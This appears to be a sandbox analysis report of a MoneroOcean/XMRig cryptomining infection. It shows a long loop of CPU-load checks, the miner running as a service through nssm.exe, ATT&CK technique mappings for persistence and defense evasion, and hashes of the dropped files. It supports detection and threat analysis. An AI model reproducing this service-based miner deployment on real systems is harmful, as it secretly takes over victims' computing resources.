  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4764
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:360
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:828
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1568
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:740
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1448
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3480
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5048
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3532
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1776
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3156
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:208
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2340
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:600
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2824
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3540
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3724
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5068
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2116
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1780
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5072
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1320
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1464
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4000
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4732
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2152
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4504
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4492
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1772
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:64
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4204
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3500
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:616
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3608
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4664
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2392
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3900
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3908
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:528
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4392
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2344
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5104
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5076
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2988
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4408
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3772
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1168
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1500
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3716
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1088
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3320
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:344
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3084
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4396
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:584
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4352
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3432
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:680
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4988
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2548
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5004
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1824
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3212
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2416
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4624
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:304
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2500
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2136
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3156
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2340
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:5060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2212
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2824
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4720
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5068
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1780
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1380
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4068
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1320
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4584
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:776

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:3512
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3912

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ea6243fdb2bfcca2211884b0a21a0afc

SHA1
2eee5232ca6acc33c3e7de03900e890f4adf0f2f

SHA256
5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

SHA512
189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0e7379013114c0582d714f4733d2cf0c

SHA1
b5f01926045453750ae373a2e37571c7f330ad5e

SHA256
6ca746ad33400ffbd276c27a04524f5da26740605c09de9c416e824b79b47098

SHA512
222289153d85dd962fd3a89d08afa1ade24fc5762ff6b24efb4138ecbb4b52eb2276a00732c8860ee42361db8167c5f83bd943b179b5b314077fca6b69396f4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
45c4923c96e4bc299b16db955bf75c5e

SHA1
635b36d4f5369e04ca67d4f9ce840cfde2de2c31

SHA256
4bce2f12ac940002c935a2d56bd8573982989bf11bc22af6735eb54b9f561597

SHA512
b00a83a1c746796ce8abfdec5c955af2173e7836db102a98c515907c31050e52219e436f2ba77aa270022e01a6afbeef24be4a2e1ab5c971829820ac01e5012c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d7aa40b76b1fd5df786bc788a3c9bae8

SHA1
2779efcd90ce8b8756f7e0435748c5242a29bd30

SHA256
c1deabd5f04140cdbf564f0c5453567e104ff1d0f4629f17a306ba4e83f1872e

SHA512
ff783e506ce17f0cba43a2b643a4e589233921ded6e6dc7b33d7662b18da766c23f9d7a4994122699c52676d038c8c67cf394e3c712c921e9fbf5dcc77f52e2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cd3af0a1998cf7660d194af241cb5d23

SHA1
8954cdf80fa15df5badbd33c81db5e435fa37c9c

SHA256
462ca0fb647b7e55113b025e95efd2d569069e0b22f5542899812aee032fcfc6

SHA512
2c7157ae14837aeab4ac4d1e3f971507fcbc2034ef6c491a524696602b9e7cd20d8a0917b91dd0c5ea16e4645d128c9aafc4df38ad531941f9c423a632707c8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
76bcf858c6bf0677234a8c610512c8bf

SHA1
9699a10e244a429ace216df889c8e3132ff2b9cf

SHA256
38b4304989c3cfa71ad42a823511c45f577af99853a04ab2cb6ca834f6bd2944

SHA512
6294e175377493f7709c4cbc547bd939409df7b792cd68c44cd387adeec000dc6d565f86437f7233a8177014fe08fed3f67fb1f1aef50a31247729bc500ee298

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d79b44c24518f0d9e5034e4b2a2cd52d

SHA1
65806ce165b7e60f7a660acec50923a2b1acb020

SHA256
2b459ce1813345b0da6d2668ffa12091027b117835fcfeb89b1d29c4b944a9e0

SHA512
0c64d83df18c8310db8968f87b52eac0cd1df187baffda99fbd80473f1b7c66149e9e67866781be62ad7bbf0c6422ca1260f0a74d5f3185ac64c668bde5b9506

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
70ef7979be5421d4e68498bd41f9e5f0

SHA1
308631f9e353eb72c1e628beb26b43b743993141

SHA256
2bbc1c73a12bb8a580fb9d78d95841b65518618f54f5020af2df51d0a4928c05

SHA512
0cea63bb3e5ecc038b5a1b7a7efca6c364c0e150300b9133fc8f64033f767580ec03e211a043a509c39f0a1c901a7c117f6db80b8f1657fa12c603dce7a44ae3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c4dec0da3af15ecfa85ccd489b952aeb

SHA1
7d2f98ba2fc55b07e7f670fc951c3ff2d9e7d382

SHA256
66ce21828b96e0cbe71dcd6022c93ca4d394e87b07acb9a09c61cf02799ebf4d

SHA512
d4a141f0ca3055796bc0bf162d9efd9c0626fb36ba72e06b5a868f83879f10cbd059c0f45d0ec14d74b454d2a1ffbe36366350c59b81be12abbfa154fecf3dfc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
51b9cae334944e9ddbe0698688e3672c

SHA1
25c89c3bbcafb3f57a3421993d8310f59d8bd914

SHA256
11149d16810b337754872458a5289d62c370a67546998dfd94857a57b1cc004c

SHA512
679d62050a0b8419317361d262d9a5d9d4ff2dd4889a02ce6da451f98687261bc45fa8b5c564a1c20461a39b9875844fac15af3cd523c8ef3f88096e3e9694bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
72ee7da3ec26e5c044d6e228363af6ec

SHA1
bdd84a3fad6a9943280a0718f072c79911ff648c

SHA256
f85af5f1bd6b9f68e6dd64aecf8edfba47ccf0774ac16de8638a94084cb3297d

SHA512
87e48571b95893f36a379441df5db4dac4b9a944f5ca5f1d6aaf94a736371d2a9fd55962aced5d907e6dec3375ea3ee0b30d7cdd94c00395fd582dca19dd61ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
df0318b1a000e650b7f1c6529762c512

SHA1
0ad2b36b63c693335fa20ba3e26f5e0821c07575

SHA256
8fb56540f97276094e367905e02f97b4a7c8b336bbb75a45734a89791353bc52

SHA512
0cfef575cc0861d6b461489eb1452858bb3f906e16708c206411aecd1e0a133df5c8425757510b654c4d4954b8e27088e535e25624948b8ffbee87333bdae4ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2bcf9a4ece777bb6bec8a7e9b3b16c6e

SHA1
607ee097bf5287d8d8d4b12645b23b14a326971b

SHA256
b6d97ddddda6e853d4bd066cb02073c79940cb2e69c8b5958387dd2e4e5d927f

SHA512
c0436039fc075ed662be3690e1b789ea2e4112bed763691bb521bed071a3cc34226d6f69da9e1936362426ddb39c372a41a571a116398918fab07176e04b496d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c4ddadb44618b19df7bdd2be295a8e0c

SHA1
a6a5f643f04f16df8fcbd786d5c0099a1dc7148e

SHA256
3259889114fc77a50386766032744170214f6af52702362afa01bb6db6d2b8de

SHA512
c09c36f699e08d8a5cb18cf1cdcf739bed1b2ab5aa9740683bcd3f30b79eb7f814606fbdd0c057cd34118ad63a730c52154eeed1616a4baef69e709f46331079

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rehrvebn.ma4.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\script_2777b63e.bat

Filesize
556B

MD5
889ed31bd87dcdd18996201e93fca965

SHA1
bebcb6fa0d36fabc6edc469cc3177251bd50dbb8

SHA256
6fd0f837746697ef471db89d8fa9290114c4c2dd416020f5ad9dc1837fb16ee7

SHA512
11e131928d8a7fd30b20943aeda62a9185b9b961fc577a75a6de87635b5a89a13fcbbfbbf0abd8e6a5cdc3052ef98c40bbebb33252ec00e73fcf18debda10f0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp77D0.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
67099c11aee7715195c370daf8713cf6

SHA1
4ffe1365749d5828225c3c91efbf37524f6b4574

SHA256
91a469ac7711ea2098eeed42b648548c51a109b83fd54fac53b643a4d9f127c8

SHA512
4a4351749e0a6dfb211196af3eb892486c3df501ec6923cad96c16605e40cca3febaf908ece586e36a55b2945141140c18c0359badd0d609999aed747221145b

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
a8e39baef17f719c60424e17aeca1c47

SHA1
c0cf1a048cdb1157b40c6e0213b7173b2ab4929a

SHA256
d2547a9e20763e86d27fb651326bb1defe16d8077c770e2bdaef64cb25d581bd

SHA512
fa184a96777b612b637a24cfb2f319608d3766b5676a58e53f12b68ca95c1f78c1c22e11eb2cc7843cac4012b3703320adcd8b297a41af0878b62c906836f5d6

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
232247e04b3f29d89bddbef4ebf1fab1

SHA1
efbe39231130499fc4764e286c5dc556a918fdab

SHA256
c030bd919756e0746997327d3828dbdee61571a1501dccff18d8bcd76d62d797

SHA512
8019bc18074f67c10319cca0cca9fcf27c53483e0b09600b3182243350ae1efdd5b7503e4a28ecbe4ea8cfe788e8f6e90da5698bb1dfddcd5e1d2e61564ca1f1

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
2589fddda172b2ac8ae08f6c82d53a45

SHA1
d71c7915116fbecf811b05385aedc12453d53d31

SHA256
e2ffa3fc87885c6b119ae6c92ce48789707c3de698e0dddd5687f3e1113740a2

SHA512
50629354e805c09380ff477f2b415641bd5718006b129cbe024f297305bc2bd3a14f4afe4574c178927bc7fda91792f4e57a8bdd76f85b7ae8cc47166f6e2642

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/1828-462-0x00007FFF2E020000-0x00007FFF2EA0C000-memory.dmp

Filesize
9.9MB

Download
memory/1828-58-0x00007FFF2E020000-0x00007FFF2EA0C000-memory.dmp

Filesize
9.9MB

Download
memory/1828-60-0x00007FFF2E020000-0x00007FFF2EA0C000-memory.dmp

Filesize
9.9MB

Download
memory/1828-63-0x00007FFF2E020000-0x00007FFF2EA0C000-memory.dmp

Filesize
9.9MB

Download
memory/2504-181-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2504-180-0x0000000002FB0000-0x0000000002FD0000-memory.dmp

Filesize
128KB

Download
memory/3716-27-0x00007FFF2E020000-0x00007FFF2EA0C000-memory.dmp

Filesize
9.9MB

Download
memory/3716-10-0x00007FFF2E020000-0x00007FFF2EA0C000-memory.dmp

Filesize
9.9MB

Download
memory/3716-9-0x0000025C67900000-0x0000025C67976000-memory.dmp

Filesize
472KB

Download
memory/3716-8-0x00007FFF2E020000-0x00007FFF2EA0C000-memory.dmp

Filesize
9.9MB

Download
memory/3716-5-0x0000025C4F270000-0x0000025C4F292000-memory.dmp

Filesize
136KB

Download
memory/3716-51-0x00007FFF2E020000-0x00007FFF2EA0C000-memory.dmp

Filesize
9.9MB

Download
memory/3716-2-0x00007FFF2E023000-0x00007FFF2E024000-memory.dmp

Filesize
4KB

Download
